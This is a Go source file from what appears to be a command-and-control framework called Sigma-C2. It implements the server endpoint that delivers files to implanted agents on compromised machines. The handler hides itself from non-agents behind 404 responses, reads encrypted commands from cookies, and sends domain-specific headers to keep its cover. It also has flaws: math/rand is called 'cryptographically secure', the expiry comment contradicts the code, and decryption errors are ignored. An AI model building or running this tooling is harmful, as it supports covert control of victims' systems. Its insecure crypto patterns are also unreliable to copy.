pkhazov/Sigma-C2
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
0df36d871ecaeba0621a6d29a2acb3f9917d5fc2
Sigma-C2/server/files_upload.go
Pavlo Khazov 0df36d871e Read changelog
2025-08-18 16:03:04 +02:00

224 lines
5.8 KiB
Go
Raw Blame History

package main
import (
"encoding/base64"
"encoding/hex"
"fmt"
"io"
"log"
"math/rand"
"net/http"
"os"
"strings"
"sync"
"time"
)
// FileMapping represents a token-to-file mapping
type FileMapping struct {
Token string
FilePath string
AgentID string
FileName string
Created time.Time
}
// Global file token storage (use database/redis in production)
var fileTokens sync.Map
// Generate cryptographically secure token
func generateSecureToken() string {
bytes := make([]byte, 16)
rand.Read(bytes)
return hex.EncodeToString(bytes)
}
// Create download token for a file
func CreateDownloadToken(agentID, filePath, fileName string) string {
token := generateSecureToken()
mapping := FileMapping{
Token: token,
FilePath: filePath,
AgentID: agentID,
FileName: fileName,
Created: time.Now(),
}
fileTokens.Store(token, mapping)
log.Printf("[+] Created download token %s for agent %s, file: %s", token, agentID, fileName)
return token
}
// Get file mapping by token
func getFileMapping(token string) (FileMapping, bool) {
value, exists := fileTokens.Load(token)
if !exists {
return FileMapping{}, false
}
return value.(FileMapping), true
}
// Remove token (for one-time use)
func removeToken(token string) {
fileTokens.Delete(token)
}
// Send file to agent
func handleFileDownload(w http.ResponseWriter, r *http.Request) {
// Log every request to file and console
logRequest(r)
// Only allow GET requests
if r.Method != "GET" {
http.Error(w, "Method not allowed", http.StatusMethodNotAllowed)
return
}
// Get domain from request
domain := extractDomain(r.Host)
// Get domain and profile
profile, exists := GetDomainProfile(domain)
if !exists {
http.Error(w, "Domain not configured", http.StatusNotFound)
log.Printf("Domain not configured: %s", domain)
return
}
log.Printf("Domain requested: %s", domain)
// Verify this is an agent communication
if !IdentifyAgent(r) {
log.Printf("Non-agent attempted file download from %s", r.RemoteAddr)
http.Error(w, "Not Found", http.StatusNotFound)
return
}
log.Printf("[+] File download request from agent at %s", r.RemoteAddr)
// Extract message from cookie
message := ""
cookies := r.Cookies()
found := false
for _, cookie := range cookies {
if cookie.Name == profile.MessageCookieName {
// URL decode the cookie value to handle special characters
// decodedValue, err := urlDecode(cookie.Value)
// if err != nil {
// log.Printf("Failed to decode cookie value: %v", err)
// continue
// }
// message = decodedValue
message = cookie.Value
log.Printf("[+] Download message cookie found (url decoded): %s", message)
found = true
break
}
}
if !found {
log.Printf("No message cookie found in download request from %s", r.RemoteAddr)
http.Error(w, "Bad Request", http.StatusBadRequest)
return
}
// Decode from base64
decodedMessage, _ := base64.StdEncoding.DecodeString(message)
// Decrypt
decryptedMessage, _ := encryptAES128CTR(decodedMessage, key, key)
// Convert to string
message = string(decryptedMessage)
log.Printf("Decrypted message: %s", message)
// Parse the message to get agent ID and token
messageParts := strings.SplitN(message, "~", 4)
if len(messageParts) < 3 {
log.Printf("Invalid download message format from %s: %s", r.RemoteAddr, message)
http.Error(w, "Bad Request", http.StatusBadRequest)
return
}
agentID := messageParts[0]
messageType := messageParts[1] // Should be "DOWNLOAD"
token := messageParts[2]
if messageType != "DOWNLOAD" {
log.Printf("Invalid message type for file download: %s", messageType)
http.Error(w, "Bad Request", http.StatusBadRequest)
return
}
// Get file mapping for token
mapping, exists := getFileMapping(token)
if !exists {
log.Printf("Invalid or expired token from agent %s: %s", agentID, token)
http.Error(w, "Not Found", http.StatusNotFound)
return
}
// Verify token belongs to this agent
if mapping.AgentID != agentID {
log.Printf("Token %s does not belong to agent %s (belongs to %s)", token, agentID, mapping.AgentID)
http.Error(w, "Forbidden", http.StatusForbidden)
return
}
// Check if token has expired (1 hour)
if time.Since(mapping.Created) > time.Minute {
log.Printf("Token %s has expired for agent %s", token, agentID)
removeToken(token) // Clean up expired token
http.Error(w, "Token Expired", http.StatusGone)
return
}
// Check if file still exists
if _, err := os.Stat(mapping.FilePath); os.IsNotExist(err) {
log.Printf("File no longer exists: %s", mapping.FilePath)
removeToken(token) // Clean up invalid token
http.Error(w, "File Not Found", http.StatusNotFound)
return
}
log.Printf("[+] Serving file to agent %s: %s (token: %s)", agentID, mapping.FileName, token)
// Add domain-specific headers to maintain cover
addDomainHeaders(w, profile)
// Set content disposition to suggest filename
// w.Header().Set("Content-Disposition", fmt.Sprintf("attachment; filename=\"%s\"", mapping.FileName))
w.Header().Set("Content-Type", "application/octet-stream")
// Open and serve the file
file, err := os.Open(mapping.FilePath)
if err != nil {
log.Printf("Failed to open file %s: %v", mapping.FilePath, err)
http.Error(w, "Internal Server Error", http.StatusInternalServerError)
return
}
defer file.Close()
// Get file info for logging
fileInfo, _ := file.Stat()
fileSize := fileInfo.Size()
// Stream file to client
bytesServed, err := io.Copy(w, file)
if err != nil {
log.Printf("Error streaming file to agent %s: %v", agentID, err)
return
}
logMessage := fmt.Sprintf("File downloaded by agent %s: %s (%d bytes)", agentID, mapping.FileName, bytesServed)
log.Print(logMessage)
SendMessageToAllOperators(logMessage)
// Remove token
removeToken(token)
log.Printf("[+] File download completed: %s (%d bytes served)", mapping.FilePath, fileSize)
}
Reference in New Issue View Git Blame Copy Permalink